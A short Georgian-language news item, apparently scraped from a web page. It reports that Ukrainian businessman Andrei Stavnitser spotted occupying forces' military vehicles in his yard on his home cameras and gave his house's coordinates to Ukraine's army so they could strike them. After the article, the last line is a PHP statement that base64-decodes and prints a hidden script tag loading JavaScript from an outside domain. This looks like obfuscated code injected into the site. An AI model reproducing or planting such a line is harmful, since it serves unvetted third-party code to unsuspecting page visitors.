celsiusi
ავერსი საქკაბელი
უკრაინელმა ბიზნესმენმა, ანდრეი სტავნიცერმა საკუთარ სახლში დამონტაჟებულ კამერებზე დაინახა, თუ როგორ იყო განთავსებული ეზოში ოკუპანტების 12 ერთეული სამხედრო ტექნიკა, მათ შორის მრავალჯერადი გაშვების სარაკეტო სისტემა, რათა კიევზე იერიში მიეტანათ. ამის შესახებ ინფორმაციას უკრაინის შს მინისტრის მოადგილე, ანტონ გერაშენკო ავრცელებს. 
 
მისივე თქმით,ანდრეი სტავნიცერი თავად დაუკავშირდა უკრაინის შეიარაღებულ ძალებს და მიაწოდა მისი სახლის კოორდინატები, რათა ოკუპანტების ტექნიკა აეფეთქებინათ. 
 
„სახლს ავაშენებთ, ქვეყანას ავაშენებთ, მთავარია, რაც შეიძლება მეტი სიცოცხლე გადავარჩინოთ. მადლობა უნდა გადამიხადოთ არა მე, არამედ, ჩვენს გმირებს - უკრაინის შეიარაღებული ძალების ჯარისკაცებს!“, - განაცხადა მან.
994
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");